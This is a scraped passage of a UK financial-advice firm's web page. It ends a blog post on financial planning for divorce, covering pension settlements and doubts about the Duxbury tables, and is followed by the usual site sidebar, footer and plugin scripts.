many of the divorce cases that we see – often to the significant disadvantage of the wife.\r\n\r\n&nbsp;\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\r\n\r\n&nbsp;\r\n\r\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. You’ve enough to worry about, without worrying about money.\r\n\r\n&nbsp;\r\n\r\nIf you feel that you may be heading towards a divorce – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\r\n\r\n&nbsp;\r\n\r\nWarmest regards\r\n\r\n&nbsp;\r\n\r\nSam\r\n\r\n&nbsp;\r\n\r\nResources\r\n\r\n&nbsp;\r\n\r\n<a href=\"http://bbc.in/1jvov24\">BBC statistics on divorce</a>\r\n<span style=\"line-height: 1.5em;\"><a href=\"http://bit.ly/1gkdUSh\">ONS stats on divorce\r\n</a></span><a href=\"http://www.familylore.co.uk/2012/09/family-lore-clinic-how-to-do-duxbury\">How to do Duxbury</a>\r\n<a href=\"http://www.wikivorce.com/divorce/Divorce-Advice/Maintenance/193742-Duxbury-lump-sum-to-replace-maintenance-payments\">Wikivorce – debate on Duxbury</a>\r\n<a href=\"http://www.scotsman.com/news/scotland/top-stories/scottish-divorce-rate-down-due-to-economic-climate-1-2162516\">Scotland source divorce rates down</a>:\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"vc_span3 wpb_column column_container\">\r\n\r\n&nbsp;\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n\r\n&nbsp;\r\n<div class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n<h2> Fast Facts</h2>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later.\r\n\r\n&nbsp;\r\n\r\n#1: Divorce rates increasing\r\n\r\nThe ONS estimates that 42% of marriages now end in divorce, 117,588 divorces in England and Wales and the figure for Scotland 9,814.\r\n\r\n&nbsp;\r\n\r\n<span style=\"line-height: 1.5em;\">#2: More need for financial advice\r\n</span>The longer a couple have been together the more complicated divorce proceedings are likely to be\r\n\r\n&nbsp;\r\n\r\n<span style=\"line-height: 1.5em;\">#3 Pension settlement\r\n</span>Once pensions are brought into the divorce proceedings  they can outstrip the value of the family home.\r\n\r\n&nbsp;\r\n\r\n#4: Duxbury tables\r\n\r\nTraditionally, solicitors have relied on the Duxbury Tables, (drawn up by Mrs Duxbury’s accountant 1992)\r\n\r\n&nbsp;\r\n\r\n#5: The world has changed since 1992\r\n\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">By <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Pensions\" href=\"../category/pensions/\" rel=\"category tag\">Pensions</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on Financial Planning for Divorcees\" href=\"../financial-planning-divorcees/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\"><a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/financial-planning-divorcees/&amp;p[title]=Financial%20Planning%20for%20Divorcees\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\"><a href=\"http://twitter.com/home?status=Financial+Planning+for+Divorcees%20http://www.equalitywalk.org.uk/financial-planning-divorcees/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\"><a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/financial-planning-divorcees/&amp;title=Financial%20Planning%20for%20Divorcees\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\"><a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/financial-planning-divorcees/&amp;title=Financial%20Planning%20for%20Divorcees\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\"><a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Ffinancial-planning-divorcees%2F&amp;name=Financial+Planning+for+Divorcees&amp;description=Financial+planning+associated+with+divorce+is+not+going+to+become+any+easier+%E2%80%93+and+it%E2%80%99s+one+of+those+areas+where+you+need+to+take+action+sooner+rather+than+later.\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\"><a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/financial-planning-divorcees/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\"><a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\"><a href=\"mailto:?subject=Financial Planning for Divorcees&amp;body=http://www.equalitywalk.org.uk/financial-planning-divorcees/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\"></div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../financial-planning-divorcees/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\"><input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"9de053ebf4\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"115\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\"><p>\r\n</p>\r\n<div class=\"tab-holder\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-hold tabs-wrapper\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n</p>\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</ul>\r\n<p>\r\n</p>\r\n<div class=\"tab-box tabs-container\">\r\n<p>&#13;\r\n										</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a>\r\n\r\n</div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<div class=\"avada-row\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\"><p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</section>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" 